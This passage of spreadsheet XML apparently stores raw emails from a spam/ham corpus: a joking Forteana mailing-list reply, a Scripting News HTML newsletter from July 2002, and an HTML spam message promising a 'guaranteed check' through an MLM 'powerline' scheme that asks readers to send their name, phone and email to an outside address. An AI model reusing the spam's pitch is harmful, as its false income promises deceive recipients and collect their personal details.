 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [zzzzteana] Re: Amazingly Accurate (For a Sunday Morning)
</t>
  </si>
  <si>
    <t xml:space="preserve">--- In forteana@y..., "Jayne Ayris" &lt;jayris@b...&gt; wrote:
 &gt; Think of a letter between A and W. 
 Oh, all right, then. I'll give it a go.
 Hmm. Let's See.
 "L"
 &gt; Now think of an animal that begins with that letter. 
 "Lynx"
 &gt; Repeat it out loud as you scroll down. 
 "Lynx"
 "Lynx"
 "Lynx"
 "Lynx"
 "Lynx"
 &gt;  Think of either a man's/woman's name that begins with
 &gt;  the last letter in the animals name 
 "Xena"
 &gt;  Almost there........ 
 OK.
 &gt;  Now count out the letters in that name on the fingers
 &gt; of the hand you are not using to scroll down. 
 "X"
 "E"
 "N"
 "A"
 &gt;  Take the hand you counted with and hold it out in
 &gt;  front of you at face level 
 All righty...
 &gt;  Look at you palm very closely and notice the lines in
 &gt;  your hand 
 Lots of lines. Lines and lines and lines and lines.
 &gt;  Do the lines take the form of the first letter in the
 &gt;  persons name? 
 Holy crap, they do! Amazing! Feckin' "X"s all over the feckin' place. 
 Man that is sooo cool!!11!!!!!!111!!
 &gt; Of course not....... 
 Au contraire. Look at 'em. XXXXXXXXXXs, Zillions of 'em.
 I am looking at them this very moment.
 &gt; Now smack yourself in the head, get a life, and quit
 &gt; playing stupid e-mail games!
 Are you talking to moi? Are you accusing me of being less than 
 sapient? Are you suggesting I am life-bereft?
 Igor, power-up a couple of dozen web-bots - the search-and-destroy 
 attack ones with the hard-drive killers. I shall have my revenge in 
 this domain or the next.
 Robin (Not the BAE SYSTEMS spy at all, it turns out) Hill, STEAMY 
 BESS, Brough, East Yorkshire.
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: A Guaranteed Check for you
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;HTML&gt;&lt;HEAD&gt;
 &lt;META http-equiv=Content-Type content="text/html; 
 charset=iso-8859-1"&gt;
 &lt;META content="MSHTML 6.00.2716.2200" name=GENERATOR&gt;
 &lt;STYLE&gt;&lt;/STYLE&gt;
 &lt;/HEAD&gt;
 &lt;BODY bgColor=#ffffff&gt;&lt;FONT face="ACaslon Regular"&gt;
 &lt;DIV&gt;&lt;FONT face=Arial size=2&gt;
 &lt;P align=center&gt;&lt;B&gt;You are receiving this because we have 
 exchanged e-mails
 in
 the past or your e-mail address is on file. If you wish to be 
 removed,
 removal
 instructions are at the end of this message.&lt;BR&gt;&lt;/B&gt;&lt;BR&gt;&lt;FONT 
 lang=0
 style="BACKGROUND-COLOR: #ffffff" face=Arial color=#ff0000 
 size=3
 FAMILY="SANSSERIF"&gt;&lt;B&gt;Yes, that's right! We guarantee you a
 check!&lt;BR&gt;&lt;/FONT&gt;&lt;FONT lang=0 style="BACKGROUND-COLOR: #ffffff" 
 face=Arial
 color=#000000 size=2 FAMILY="SANSSERIF"&gt;&lt;/B&gt;&lt;BR&gt;Hello, this is
 Steve&amp;nbsp;in&amp;nbsp;Georgia, USA. I hope this email finds you and 
 yours in
 good
 health.&lt;BR&gt;I have something for you to read that will interest 
 you! Thank
 You
 for your time.&lt;BR&gt;&lt;BR&gt;&lt;/FONT&gt;&lt;FONT lang=0 
 style="BACKGROUND-COLOR: #ffffff"
 face=Arial color=#ff0000 size=3 FAMILY="SANSSERIF"&gt;&lt;B&gt;Answer six 
 simple
 questions and we guarantee you a check!&lt;/FONT&gt;&lt;FONT lang=0
 style="BACKGROUND-COLOR: #ffffff" face=Arial color=#ff0000
 FAMILY="SANSSERIF"&gt;&lt;/B&gt;&amp;nbsp;&lt;/FONT&gt;&lt;FONT lang=0
 style="BACKGROUND-COLOR: #ffffff" face=Arial color=#000000
 FAMILY="SANSSERIF"&gt;&lt;BR&gt;&lt;/FONT&gt;&lt;/P&gt;&lt;/DIV&gt;
 &lt;DIV align=left&gt;&lt;FONT lang=0 style="BACKGROUND-COLOR: #ffffff" 
 color=#000000
 FAMILY="SANSSERIF"&gt;&lt;FONT face="ACaslon Regular"
 size=3&gt;&lt;STRONG&gt;1&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; Your
 name&lt;BR&gt;2&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; 
 phone&lt;BR&gt;3&amp;nbsp;&amp;nbsp;&amp;nbsp;
 &amp;nbsp;&amp;nbsp;&amp;nbsp; email&lt;BR&gt;4&amp;nbsp;&amp;nbsp;&amp;nbsp; 
 &amp;nbsp;&amp;nbsp;&amp;nbsp; time you
 can
 be reached&lt;BR&gt;5&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; Do you have 
 10 hours
 per
 week to work?&lt;BR&gt;6&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; How much 
 do you
 desire
 to earn per
 month?&lt;BR&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 &lt;BR&gt;&lt;FONT color=#0000ff&gt;Send Your Info To:&lt;/FONT&gt;&amp;nbsp;
 &lt;/STRONG&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV align=left&gt;&lt;FONT lang=0 style="BACKGROUND-COLOR: #ffffff" 
 face=Arial
 color=#000000 size=2 FAMILY="SANSSERIF"&gt;&lt;A
 href="mailto:earn_1000_per_week@btamail.net.cn"&gt;&lt;FONT 
 face="ACaslon Regular"
 size=3&gt;&lt;STRONG&gt;earn_1000_per_week@btamail.net.cn&lt;/STRONG&gt;&lt;/FONT&gt;&lt;/A&gt;&lt;/FONT&gt;
 &lt;DIV align=left&gt;&lt;FONT face="ACaslon Regular" color=#0000ff
 size=3&gt;&lt;STRONG&gt;TYPE&amp;nbsp;&amp;nbsp; "$1000" as your subject
 please!&lt;/STRONG&gt;&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV align=left&gt;&lt;FONT lang=0 style="BACKGROUND-COLOR: #ffffff" 
 face=Arial
 color=#000000 size=2 FAMILY="SANSSERIF"&gt;&lt;FONT face="ACaslon 
 Regular"&gt;&lt;FONT
 size=3&gt;&amp;nbsp;&lt;/DIV&gt;&lt;/FONT&gt;&lt;/FONT&gt;
 &lt;DIV align=center&gt;
 &lt;FORM name=signup action=check.php method=post&gt;&lt;FONT 
 face="ACaslon Regular"
 size=3&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;FONT lang=0 style="BACKGROUND-COLOR: 
 #ffffff"
 face=Arial
 color=#000000 size=2 FAMILY="SANSSERIF"&gt;&lt;FONT face="ACaslon 
 Regular"
 size=3&gt;&lt;/FONT&gt;&lt;FONT face="ACaslon Regular" size=3&gt;&lt;/FONT&gt;
 &lt;DIV&gt;&lt;BR&gt;A successful friend of mine called to inform me 
 that&amp;nbsp;an
 exclusive
 recruiting software called &lt;STRONG&gt;The A-B-C Wealth Building
 System&lt;/STRONG&gt;&amp;nbsp;would revolutionize networking as we now 
 know it.&amp;nbsp;
 He
 asked me to simply reply with the answers to the SIX simple 
 questions and
 they
 would set up an Internet Business for me for 
 &lt;STRONG&gt;FREE,&amp;nbsp;it would
 cost me
 zero to do it AND they guaranteed me a check before I spent a 
 dime!&lt;/STRONG&gt;
 I
 am glad I trusted him because I would normally ignore a pitch 
 like that
 cause
 its sounded to good to be true. I appeased him and replied with 
 the answers
 to
 the SIX simple questions, then they set up my business for me 
 fro
 FREE!&lt;BR&gt;&lt;BR&gt;I
 am grateful I did! I now have over 120 folks in my powerline in 
 less than a
 week
 and growing like crazy. They were recruited and placed there by 
 this new
 software and the A-B-C Team. It blew my mind and I've already 
 made money
 without
 doing anything. Replying with&amp;nbsp;my info&amp;nbsp;was all it took; 
 see for
 yourself. Your PowerLine will grow like MAD! You can bet I will 
 learn even
 more
 about The A-B-C Wealth Building System&amp;nbsp;. This incredible 
 software has
 only
 been in use for&amp;nbsp;6 weeks!&lt;BR&gt;&lt;BR&gt;&lt;B&gt;This is by far the best 
 system I
 have
 seen in 12 years in this business!&lt;BR&gt;Now even those who have 
 never made
 money
 before ARE!&lt;/B&gt;&lt;BR&gt;&lt;BR&gt;Now that I've done my part by alerting 
 you to this
 awesome opportunity, the rest is up to you. You owe it to 
 yourself to
 &lt;STRONG&gt;reply with the answers to the SIX simple 
 question&lt;/STRONG&gt;, let them
 set
 up your Internet Business for FREE and see what happens 
 REGARDLESS OF WHAT
 PROGRAM YOU'RE PRESENTLY WORKING.&lt;BR&gt;&lt;/DIV&gt;&lt;/FORM&gt;&lt;/DIV&gt;
 &lt;P align=left&gt;&lt;FONT face="ACaslon Regular" size=3&gt;&lt;/FONT&gt;&lt;FONT
 face="ACaslon Regular" size=3&gt;&lt;/FONT&gt;&lt;BR&gt;
 &lt;P align=center&gt;&lt;BR&gt;NOTE: The first in gets the most spill in a 
 Powerline.
 Powerline means one under the other down one line. So if 100 
 people join
 from
 this email and&lt;STRONG&gt; &lt;/STRONG&gt;you are first, you will have 99 
 people in
 your
 powerline, if your the 50th you will have 49,if your the 90th 
 you will have
 10.
 So on and so on!&lt;BR&gt;&lt;BR&gt;So needless to say &lt;STRONG&gt;go fast, 
 reply right now,
 &lt;/STRONG&gt;&amp;nbsp;get your free spot in the powerline and let this 
 system go to
 work for you like it is has been doing for all of 
 us!&lt;BR&gt;&lt;B&gt;&lt;/B&gt;&lt;/P&gt;
 &lt;P align=center&gt;&lt;B&gt;FOLKS THIS SYSTEM WORKS LIKE A CHARM AND 
 COSTS NOTHING SO
 PUT
 IT TO THE TEST!&lt;BR&gt;&lt;/B&gt;&lt;BR&gt;&lt;B&gt;TRY IT AND YOU WILL BE AMAZED! I 
 SURE
 AM!&lt;/B&gt;&lt;BR&gt;&lt;BR&gt;&lt;/FONT&gt;&lt;FONT lang=0 style="BACKGROUND-COLOR: 
 #ffffff"
 face=Arial
 color=#ff0000 size=3 FAMILY="SANSSERIF"&gt;&lt;STRONG&gt;Answer six 
 simple questions
 and
 we guarantee you a check!&lt;/STRONG&gt;&lt;FONT lang=0 
 style="BACKGROUND-COLOR:
 #ffffff"
 face=Arial color=#ff0000 size=2 
 FAMILY="SANSSERIF"&gt;&amp;nbsp;&lt;/FONT&gt;&lt;FONT lang=0
 style="BACKGROUND-COLOR: #ffffff" face=Arial color=#000000
 FAMILY="SANSSERIF"&gt;&lt;BR&gt;&lt;/P&gt;&lt;/FONT&gt;
 &lt;DIV align=left&gt;&lt;FONT lang=0 style="BACKGROUND-COLOR: #ffffff" 
 color=#000000
 FAMILY="SANSSERIF"&gt;&lt;FONT face="ACaslon Regular"
 size=3&gt;&lt;STRONG&gt;1&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; Your
 name&lt;BR&gt;2&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; 
 phone&lt;BR&gt;3&amp;nbsp;&amp;nbsp;&amp;nbsp;
 &amp;nbsp;&amp;nbsp;&amp;nbsp; email&lt;BR&gt;4&amp;nbsp;&amp;nbsp;&amp;nbsp; 
 &amp;nbsp;&amp;nbsp;&amp;nbsp; time you
 can
 be reached&lt;BR&gt;5&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; Do you have 
 10 hours
 per
 week to work?&lt;BR&gt;6&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; How much 
 do you
 desire
 to earn per
 month?&lt;BR&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;BR&gt;&lt;FONT
 color=#0000ff&gt;&lt;FONT color=#0000ff&gt;Send Your Info 
 To:&lt;/FONT&gt;&amp;nbsp;
 &lt;DIV align=left&gt;&lt;FONT lang=0 style="BACKGROUND-COLOR: #ffffff" 
 face=Arial
 color=#000000 size=2 FAMILY="SANSSERIF"&gt;&lt;A
 href="mailto:earn_1000_per_week@btamail.net.cn"&gt;&lt;FONT 
 face="ACaslon Regular"
 size=3&gt;&lt;STRONG&gt;earn_1000_per_week@btamail.net.cn&lt;/STRONG&gt;&lt;/FONT&gt;&lt;/A&gt;&lt;/FONT&gt;
 &lt;DIV align=left&gt;&lt;FONT face="ACaslon Regular" 
 size=3&gt;&lt;STRONG&gt;TYPE&amp;nbsp;&amp;nbsp;
 "$1000" as your subject
 please!&lt;/STRONG&gt;&lt;/FONT&gt;&lt;/DIV&gt;&lt;/FONT&gt;&lt;/STRONG&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;FONT 
 lang=0
 style="BACKGROUND-COLOR: #ffffff" face=Arial color=#000000 
 size=2
 FAMILY="SANSSERIF"&gt;&lt;FONT face="ACaslon Regular"
 size=3&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;FONT lang=0 
 style="BACKGROUND-COLOR: #ffffff"
 face=Arial color=#000000 
 FAMILY="SANSSERIF"&gt;&lt;BR&gt;&lt;BR&gt;&lt;STRONG&gt;&amp;nbsp;&amp;nbsp;The
 Success Team 2002&lt;/STRONG&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;/DIV&gt;
 &lt;P align=left&gt;&lt;FONT face="ACaslon Regular"&gt;&lt;FONT
 face=Arial&gt;Regards,&lt;BR&gt;&lt;BR&gt;Steve &lt;BR&gt;Ga, 
 USA&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;/FONT&gt;&lt;FONT
 face="ACaslon Regular"&gt;&lt;/FONT&gt;&lt;/P&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face="ACaslon Regular"&gt;&lt;FONT 
 size=3&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/DIV&gt;
 &lt;DIV align=left&gt;&lt;BR&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;FONT lang=0 
 style="BACKGROUND-COLOR:
 #ffffff"
 face=Arial color=#000000 FAMILY="SANSSERIF"&gt;&lt;B&gt;&lt;FONT
 face="ACaslon Regular"&gt;Removal&amp;nbsp;&amp;nbsp;&lt;BR&gt;Further 
 transmissions to you
 by
 the sender of this &lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV align=left&gt;&lt;FONT lang=0 style="BACKGROUND-COLOR: #ffffff" 
 face=Arial
 color=#000000 FAMILY="SANSSERIF"&gt;&lt;B&gt;&lt;FONT face="ACaslon
 Regular"&gt;email&lt;/FONT&gt;
 &lt;/B&gt;&lt;/FONT&gt;&lt;FONT lang=0 style="BACKGROUND-COLOR: #ffffff" 
 color=#000000
 FAMILY="SANSSERIF"&gt;&lt;B&gt;&lt;FONT face="ACaslon Regular"&gt;may be 
 stopped at no cost
 to
 you by sending &lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV align=left&gt;&lt;FONT lang=0 style="BACKGROUND-COLOR: #ffffff" 
 color=#000000
 FAMILY="SANSSERIF"&gt;&lt;B&gt;&lt;FONT face="ACaslon Regular"&gt;a blank email
 &lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;FONT lang=0 style="BACKGROUND-COLOR: #ffffff"
 color=#000000
 FAMILY="SANSSERIF"&gt;&lt;B&gt;&lt;FONT face="ACaslon Regular"&gt;with
 "removeplease"&amp;nbsp;in
 the subject&amp;nbsp;to&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV align=left&gt;&lt;FONT lang=0 style="BACKGROUND-COLOR: #ffffff" 
 color=#000000
 FAMILY="SANSSERIF"&gt;&lt;B&gt;&lt;A 
 href="mailto:removeplease@excite.com"&gt;&lt;FONT
 face="ACaslon Regular"&gt;removeplease@excite.com&lt;/FONT&gt;&lt;/A&gt;&lt;FONT
 face="ACaslon Regular"&gt;&amp;nbsp;.&amp;nbsp; W&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;FONT 
 lang=0
 style="BACKGROUND-COLOR: #ffffff" color=#000000 
 FAMILY="SANSSERIF"&gt;&lt;B&gt;&lt;FONT
 face="ACaslon Regular"&gt;e honor all remove 
 &lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV align=left&gt;&lt;FONT lang=0 style="BACKGROUND-COLOR: #ffffff" 
 face=Arial
 color=#000000 FAMILY="SANSSERIF"&gt;&lt;STRONG&gt;&lt;FONT face="ACaslon
 Regular"&gt;requests
 at once. 
 &lt;BR&gt;&lt;/DIV&gt;&lt;/FONT&gt;&lt;/STRONG&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/BODY&gt;&lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Scripting News Update
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 	&lt;body&gt;
 		&lt;table border="0"&gt;
 			&lt;tr&gt;
 				&lt;td width="25"&gt;&amp;nbsp;&lt;/td&gt;
 				&lt;td width="450"&gt;
 					&lt;table border="0" width="100%"&gt;
 						&lt;tr&gt;
 							&lt;td&gt;&lt;img src="http://static.userland.com/misc/snImages/scriptingNewsBulletinLogo.gif" width="244" height="36"&gt;&lt;/td&gt;
 							&lt;td align="right"&gt;&lt;form name="unsubscribeForm" action="http://www.userland.com/dailyUpdatesUnsubscribe" method="POST"&gt;&lt;input type="hidden" name="recipient" value="legit-list-scriptingnews@jmason.org"&gt;&lt;input type="hidden" name="newsletter" value="scriptingNews"&gt;&lt;input type="submit" value="Unsubscribe" name="unsubscribeButton"&gt;&lt;/form&gt;&lt;/td&gt;
 							&lt;/tr&gt;
 						&lt;/table&gt;&lt;p&gt;
 					&lt;a name="When:4:29:48PM"&gt;&lt;a href="http://radio.weblogs.com/0001015/images/2002/07/30/metsManagementLosers.gif"&gt;Apparently&lt;/a&gt; the NY Mets couldn't find a way to compromise with some of the team's most dedicated fans. A sad day for New York baseball. What would Mookie say??&amp;nbsp;&lt;a href="http://scriptingnews.userland.com/backissues/2002/07/30#When:4:29:48PM" title="Permanent link to this item in archive."&gt;&lt;img src="http://www.scripting.com/images/2001/09/20/sharpPermaLink3.gif" height="9" width="6" border="0"&gt;&lt;/a&gt;&lt;br&gt;&lt;br&gt;
 &lt;a name="When:4:23:56PM"&gt;&lt;a href="http://www.salon.com/tech/feature/2002/07/30/file_trading/print.html"&gt;Salon&lt;/a&gt;: "Listen's $10-per-month Rhapsody service has a fantastic interface, and, since it has content from all five labels, you can find much of what you'd like on it. You can listen to any song as often as you'd like -- an option that gives a taste of what a perfect subscription service would feel like. The only trouble is, Listen won't let you burn -- and, as one file trader asked, 'Who wants to be stuck listening to shit at their computer?'" &amp;nbsp;&lt;a href="http://scriptingnews.userland.com/backissues/2002/07/30#When:4:23:56PM" title="Permanent link to this item in archive."&gt;&lt;img src="http://www.scripting.com/images/2001/09/20/sharpPermaLink3.gif" height="9" width="6" border="0"&gt;&lt;/a&gt;&lt;br&gt;&lt;br&gt;
 &lt;a name="When:12:45:01PM"&gt;&lt;a href="http://tools.schwimmerlegal.com/blog/2002/07/30.html"&gt;Martin Schwimmer&lt;/a&gt;, a trademark attorney and Mets fan, weighs in on Bryan Hoch's MetsOnline &lt;a href="#When:7:11:28AM"&gt;situation&lt;/a&gt;.&amp;nbsp;&lt;a href="http://scriptingnews.userland.com/backissues/2002/07/30#When:12:45:01PM" title="Permanent link to this item in archive."&gt;&lt;img src="http://www.scripting.com/images/2001/09/20/sharpPermaLink3.gif" height="9" width="6" border="0"&gt;&lt;/a&gt;&lt;br&gt;&lt;br&gt;
 &lt;a name="When:2:31:27PM"&gt;&lt;a href="http://www.nytimes.com/2002/07/30/nyregion/30MAN.html?ex=1028692800&amp;en=1f0fdbe386a7f981&amp;ei=5007&amp;partner=USERLAND"&gt;Joel Klein&lt;/a&gt;, Microsoft's chief prosecutor in the Clinton Administration, is &lt;a href="http://www.nytimes.com/2002/07/30/nyregion/30CITI.html?ex=1028692800&amp;en=58032270ad37c1b3&amp;ei=5007&amp;partner=USERLAND"&gt;named&lt;/a&gt; &lt;a href="http://www.nytimes.com/2002/07/30/nyregion/30SCHO.html?ex=1028692800&amp;en=222f7c75dd59fdb2&amp;ei=5007&amp;partner=USERLAND"&gt;chancellor&lt;/a&gt; of New York's public school system.&amp;nbsp;&lt;a href="http://scriptingnews.userland.com/backissues/2002/07/30#When:2:31:27PM" title="Permanent link to this item in archive."&gt;&lt;img src="http://www.scripting.com/images/2001/09/20/sharpPermaLink3.gif" height="9" width="6" border="0"&gt;&lt;/a&gt;&lt;br&gt;&lt;br&gt;
 &lt;a name="When:12:21:11PM"&gt;It's been one week since Salon's blogs booted up. Scott Rosenberg posts a &lt;a href="http://blogs.salon.com/0000014/2002/07/30.html#a40"&gt;progress report&lt;/a&gt;. &amp;nbsp;&lt;a href="http://scriptingnews.userland.com/backissues/2002/07/30#When:12:21:11PM" title="Permanent link to this item in archive."&gt;&lt;img src="http://www.scripting.com/images/2001/09/20/sharpPermaLink3.gif" height="9" width="6" border="0"&gt;&lt;/a&gt;&lt;br&gt;&lt;br&gt;
 &lt;a name="When:1:52:10PM"&gt;&lt;a href="http://blogs.salon.com/0001107/2002/07/30.html#a10"&gt;FarrFeed&lt;/a&gt;: "I love this stuff."&amp;nbsp;&lt;a href="http://scriptingnews.userland.com/backissues/2002/07/30#When:1:52:10PM" title="Permanent link to this item in archive."&gt;&lt;img src="http://www.scripting.com/images/2001/09/20/sharpPermaLink3.gif" height="9" width="6" border="0"&gt;&lt;/a&gt;&lt;br&gt;&lt;br&gt;
 &lt;a name="When:12:37:52PM"&gt;I know this &lt;a href="http://www.google.com/search?hl=en&amp;lr=&amp;ie=UTF-8&amp;oe=UTF-8&amp;safe=off&amp;q=dave&amp;btnG=Google+Search"&gt;isn't big news&lt;/a&gt; for most of you, but I'm no longer the first &lt;a href="http://www.scripting.com/"&gt;Dave&lt;/a&gt; on Google. Maybe someday I will be, again. :-(&amp;nbsp;&lt;a href="http://scriptingnews.userland.com/backissues/2002/07/30#When:12:37:52PM" title="Permanent link to this item in archive."&gt;&lt;img src="http://www.scripting.com/images/2001/09/20/sharpPermaLink3.gif" height="9" width="6" border="0"&gt;&lt;/a&gt;&lt;br&gt;&lt;br&gt;
 &lt;a name="When:1:56:53PM"&gt;Well, yesterday I went for my 30-day post op review (it was actually 38 days after I was discharged) and there was good news and bad news. The good news is that I'm healing quickly. My body is very strong and doing really well. My blood pressure is great. Heart rate is great. Cholesterol needs work and I have to lose a bunch of weight, and of course I can't smoke. Now the bad news. I have to be a saint for the rest of my life. I knew this day was coming. As I start to feel better, I want to relax. That ain't going to happen. Oy. Here's my &lt;a href="http://www.ciudadfutura.com/poprock/allmwast.html"&gt;old theme song&lt;/a&gt;. "Don't ask me to be Mister Clean, cause baby I don't know how." I need a new song. Oh mama. &lt;img src="http://static.userland.com/shortcuts/images/qbullets/sidesmiley.gif"&gt;&amp;nbsp;&lt;a href="http://scriptingnews.userland.com/backissues/2002/07/30#When:1:56:53PM" title="Permanent link to this item in archive."&gt;&lt;img src="http://www.scripting.com
  /images/2001/09/20/sharpPermaLink3.gif" height="9" width="6" border="0"&gt;&lt;/a&gt;&lt;br&gt;&lt;br&gt;
 &lt;a name="When:12:14:51PM"&gt;&lt;a href="http://radio.weblogs.com/0107946/2002/07/30.html#a123"&gt;Ed Cone's got the blogging bug&lt;/a&gt;: "I filed my N&amp;R column about the bad proposed corporate hacking bill. It will run on Sunday -- it's an early deadline no matter what, but after blogging for a few months it's almost painful to wait so long. I feel like just posting it now, or scooping myself with the best parts....but patience is a virtue." &lt;i&gt;Hehe.&lt;/i&gt;&amp;nbsp;&lt;a href="http://scriptingnews.userland.com/backissues/2002/07/30#When:12:14:51PM" title="Permanent link to this item in archive."&gt;&lt;img src="http://www.scripting.com/images/2001/09/20/sharpPermaLink3.gif" height="9" width="6" border="0"&gt;&lt;/a&gt;&lt;br&gt;&lt;br&gt;
 &lt;a name="When:4:00:33PM"&gt;&lt;a href="http://www.cbsnews.com/stories/2002/05/23/print/main509976.shtml"&gt;Historian Stephen Ambrose&lt;/a&gt;, who is interviewed on the PBS News Hour today: "You can do whatever the hell you want. Who's going to criticize you? And if they do, what the hell do you care?" &amp;nbsp;&lt;a href="http://scriptingnews.userland.com/backissues/2002/07/30#When:4:00:33PM" title="Permanent link to this item in archive."&gt;&lt;img src="http://www.scripting.com/images/2001/09/20/sharpPermaLink3.gif" height="9" width="6" border="0"&gt;&lt;/a&gt;&lt;br&gt;&lt;br&gt;
 &lt;a name="When:9:00:35AM"&gt;Radio Free Blogistan: &lt;a href="http://blogs.salon.com/0001111/2002/07/29.html#a41"&gt;Blogger vs Radio&lt;/a&gt;.&amp;nbsp;&lt;a href="http://scriptingnews.userland.com/backissues/2002/07/30#When:9:00:35AM" title="Permanent link to this item in archive."&gt;&lt;img src="http://www.scripting.com/images/2001/09/20/sharpPermaLink3.gif" height="9" width="6" border="0"&gt;&lt;/a&gt;&lt;br&gt;&lt;br&gt;
 &lt;a name="When:7:28:48AM"&gt;&lt;a href="http://www.nytimes.com/reuters/business/business-markets-stocks.html?ex=1028692800&amp;en=fd888ae98358ea49&amp;ei=5007&amp;partner=USERLAND"&gt;Reuters&lt;/a&gt;: "Stocks briefly extended their losses in late morning trading on Tuesday, biting into Monday's monster rally."&amp;nbsp;&lt;a href="http://scriptingnews.userland.com/backissues/2002/07/30#When:7:28:48AM" title="Permanent link to this item in archive."&gt;&lt;img src="http://www.scripting.com/images/2001/09/20/sharpPermaLink3.gif" height="9" width="6" border="0"&gt;&lt;/a&gt;&lt;br&gt;&lt;br&gt;
 &lt;a name="When:7:11:28AM"&gt;&lt;a href="http://www.metsonline.net/about.shtml"&gt;&lt;img src="http://radio.weblogs.com/0001015/images/2002/07/30/bryanHoch.gif" width="45" height="62" border="0" align="right" hspace="15" vspace="5" alt="A picture named bryanHoch.gif"&gt;&lt;/a&gt;Thanks to Glenn Reynolds for the &lt;a href="http://www.instapundit.com/archives/002667.php#002667"&gt;link&lt;/a&gt; to &lt;a href="http://www.metsonline.net/"&gt;metsonline.net&lt;/a&gt;. As a Mets &lt;a href="http://davenet.userland.com/1995/04/24/thebaseballgod"&gt;fan&lt;/a&gt; since 1962, I think it's great that sites like this exist and are flourishing. Like Bryan Hoch, the webmaster, I also run websites as a labor of love, and know there isn't generally a whole lot of money left over after you pay for bandwidth. I totally believe Hoch, a college student, when he says he isn't making money. The site clearly disclaims that it is not representative of the Mets or Major League Baseball. If you go &lt;a href="http://www.metsonline.net/metsonline-ceaseandde
  sist.html"&gt;deeper&lt;/a&gt; you see that Hoch contributed his time for free to help the Mets improve their own site, before all sites were taken over by MLB in 2001 (what a bad idea, why can't teams differentiate themselves based on the quality of their community sites). Now of course there's another side to it, so let's keep an open mind. But to the owners of the Mets, please remember, it's the fans that make it work, and it's pretty clear that this website is from the fans, for the fans and the team, and that's a good thing.&amp;nbsp;&lt;a href="http://scriptingnews.userland.com/backissues/2002/07/30#When:7:11:28AM" title="Permanent link to this item in archive."&gt;&lt;img src="http://www.scripting.com/images/2001/09/20/sharpPermaLink3.gif" height="9" width="6" border="0"&gt;&lt;/a&gt;&lt;br&gt;&lt;br&gt;
 &lt;a name="When:8:01:34AM"&gt;Postscript: I've been emailing with Bryan, and asked if the local NY press has taken up his cause. He says: "Not yet. You can help by calling any one of the major metro papers (Post, Daily News, Times, Newsday)." More.. &lt;a href="http://radio.weblogs.com/0104634/2002/07/30.html#a951"&gt;Ernie the Attorney&lt;/a&gt; is looking into this. "LSU Law School is suing one of its students for trademark infringement over a website that he maintains. The site is called &lt;a href="http://www.lsulaw.com/"&gt;lsulaw.com&lt;/a&gt;, and it includes a school calendar, law-related links and comments by Douglas Dorhauer, some of them critical of the law school."&amp;nbsp;&lt;a href="http://scriptingnews.userland.com/backissues/2002/07/30#When:8:01:34AM" title="Permanent link to this item in archive."&gt;&lt;img src="http://www.scripting.com/images/2001/09/20/sharpPermaLink3.gif" height="9" width="6" border="0"&gt;&lt;/a&gt;&lt;br&gt;&lt;br&gt;
